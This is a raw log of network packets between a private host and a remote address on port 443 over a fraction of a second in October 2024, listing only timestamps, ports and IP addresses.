Oct 8, 2024 20:52:15.917525053 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.917644978 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.917659044 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.917715073 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.917722940 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.917846918 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.917865038 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.917896032 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.917903900 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.917932987 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.918546915 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.918560028 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.918625116 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.918631077 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.918675900 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.918694019 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.918732882 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.918739080 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.918756962 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.919356108 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.919369936 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.919420958 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.919428110 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.919467926 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.919686079 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.919713974 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.919840097 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.919847965 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.920623064 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.920639038 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.920681000 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.920689106 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.920716047 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.920897961 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.920933962 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.920972109 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.920979023 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.921010017 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.922096968 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.922110081 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.922167063 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.922174931 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.922204018 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.922974110 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.922991991 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.923041105 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.923048019 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.923078060 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.923146963 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.923161030 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.923192978 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.923198938 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.923212051 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.923250914 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.923268080 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.923300982 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.923306942 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.923320055 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.923877954 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.923892975 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.923949003 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.923957109 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.924077988 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.924094915 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.924133062 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.924139977 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.924149036 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.927531958 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.927541018 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.927640915 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.927649975 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.928225994 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.928244114 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.928284883 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.928292036 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.928309917 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.928338051 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.928352118 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.928400040 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.928405046 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.928473949 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.928492069 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.928528070 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.928534985 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.928579092 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.928582907 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.928597927 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.928637028 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.928643942 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.928680897 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.928762913 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.928853989 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.928999901 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.929018021 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.929083109 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.929089069 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.929131985 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.929148912 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.929183006 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.929199934 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.929223061 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.929255962 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.929289103 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.929308891 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.929316044 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.929332018 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.929629087 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.929711103 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.929749966 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.929781914 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.929788113 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.929817915 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.929821968 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.929841995 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.929862976 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.929869890 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.929903030 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.930269957 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.937375069 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.937457085 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.937475920 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.937489986 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.937530041 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.938116074 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.938133955 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.938221931 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.938237906 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.938838959 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.938857079 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.938908100 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.938915968 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.939152002 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.939169884 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.939208984 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.939215899 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.939244986 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.939543962 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.939558029 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.939615011 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.939624071 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.940509081 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.940531015 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.940570116 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.940579891 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.940610886 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.941235065 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.941250086 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.941308022 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.941315889 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.941329002 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.941818953 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.941837072 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.941875935 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.941883087 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:15.941915035 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:15.983999014 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.024316072 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.024334908 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.024441957 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.024451971 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.024492979 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.024908066 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.024924040 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.024997950 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.025005102 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.025054932 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.025790930 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.025806904 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.025887012 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.025895119 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.025933027 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.026108027 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.026124954 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.026182890 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.026190042 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.026237965 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.026654005 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.026669979 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.026710987 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.026719093 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.026751041 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.026770115 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.027631044 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.027652979 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.027718067 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.027726889 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.027795076 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.028765917 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.028780937 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.028841972 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.028857946 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.028879881 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.028907061 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.029052019 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.029067039 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.029114008 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.029120922 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.029165983 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.112289906 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.112312078 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.112422943 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.112451077 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.112528086 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.113152981 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.113168955 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.113220930 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.113230944 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.113302946 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.114140987 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.114147902 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.114219904 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.114232063 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.114697933 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.114717007 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.114758015 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.114768028 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.114778996 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.114811897 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.115315914 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.115329981 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.115374088 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.115381956 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.115401983 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.115443945 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.116158009 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.116178989 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.116209984 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.116221905 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.116242886 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.116262913 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.116379023 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.116393089 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.116455078 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.116466999 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.116501093 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.116760969 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.116779089 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.116812944 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.116821051 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.116849899 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.116864920 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.117399931 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.198615074 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.198637009 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.198746920 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.198764086 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.198796988 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.198817015 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.198853970 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.199759007 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.199767113 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.199847937 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.199860096 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.200017929 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.200040102 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.200073004 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.200081110 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.200099945 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.200368881 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.200392008 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.200428963 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.200438976 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.200465918 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.201328993 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.201343060 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.201390028 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.201399088 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.202521086 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.202543020 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.202581882 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.202589035 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.202614069 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.203278065 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.203285933 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.203346968 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.203355074 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.203387976 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.207277060 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.285553932 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.285582066 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.285677910 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.285693884 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.285739899 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.285887957 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.285931110 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.285964966 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.285974979 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.285999060 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.286015987 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.286572933 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.286588907 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.286631107 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.286640882 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.286679029 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.286978006 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.286994934 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.287060022 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.287069082 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.287111998 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.287621975 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.287636042 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.287686110 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.287693977 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.287724018 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.287739992 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.288521051 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.288553953 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.288588047 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.288594961 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.288625002 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.288640976 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.289836884 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.289855003 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.289943933 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.289951086 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.289999962 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.293687105 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.293714046 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.293772936 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.293781996 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.293811083 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.293829918 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.373302937 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.373342991 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.373495102 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.373495102 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.373574018 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.373661041 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.373681068 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.373727083 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.373749971 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:16.373789072 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:16.374074936 CEST	443	49707	188.114.97.3	192.168.2.8
